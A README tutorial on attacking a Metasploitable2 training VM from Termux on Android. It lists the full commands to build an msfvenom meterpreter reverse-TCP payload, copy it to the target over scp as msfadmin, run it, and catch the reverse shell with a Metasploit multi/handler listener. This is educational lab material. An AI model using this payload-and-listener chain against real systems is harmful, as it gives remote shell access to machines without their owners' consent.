Metasploitable2 Pentesting Using Termux

Overview

This repository demonstrates how to conduct penetration testing on a Metasploitable2 virtual machine using Termux on an Android device. It provides step-by-step guidance for generating payloads, transferring files, and executing a reverse shell.

⚠️ Disclaimer: This guide is for educational purposes only. Do not perform penetration testing without proper authorization.

---

Table of Contents

1. Prerequisites
2. Commands Explanation
3. Step-by-Step Guide
4. Ethical Disclaimer

---

Prerequisites

1. Install Termux: Download Termux from a trusted source (Google Play Store).
2. Update and upgrade packages:

   pkg update && pkg upgrade

3. Install required packages:

   pkg install git curl wget openssh python3 ruby unstable-repo metasploit

4. Verify Metasploit installation:

   msfconsole --version

5. Set up OpenSSH:

   pkg install openssh

6. Allow Termux permissions for storage and network access.

Commands Explanation

1. Launch Metasploit Framework:

    msfconsole
   

   • Purpose: Launches the Metasploit Framework for pentesting.

2. Generate Payload:

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker ip address> LPORT=4444 -f elf > shell.elf
   

   • Payload: linux/x86/meterpreter/reverse_tcp

   • LHOST: Local host IP (attacker's IP).

   • LPORT: Listening port.

   • Output: ELF file named shell.elf.

3. Transfer the Payload to Target

    scp -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa shell.elf msfadmin@<target ip address>:/tmp
   
    scp -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa shell.elf msfadmin@<target ip address>:/home/msfadmin
   

   • Purpose: Transfers the payload to the target system using SCP.

   • Options: Compatibility with older SSH algorithms.

4. SSH into the Target

    ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa msfadmin@<target ip address>
   

   • Purpose: Establishes an SSH connection to the Metasploitable2 VM.

5. Verify and Execute the Payload

   a. Check if the file exists:

    ls -l /home/msfadmin/shell.elf
   

   b. Make it executable:

    chmod +x /home/msfadmin/shell.elf
   

   c. Execute the payload:

    /home/msfadmin/shell.elf
   

Step-by-Step Guide

1. Set Up Listener in Metasploit

   Before executing the payload, set up a listener:

    msfconsole
    use exploit/multi/handler
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST <attacker ip address>
    set LPORT 4444
    exploit
   

   • Purpose: Listens for incoming connections from the target system.

2. Execute Payload on Target Follow the commands listed in the previous section to execute the payload and gain a reverse shell.

Ethical Disclaimer

This repository is strictly for educational purposes. Unauthorized penetration testing is illegal and unethical. Always obtain proper authorization before conducting any pentesting activities.

License

This project is licensed under the MIT License - see the LICENSE file for details.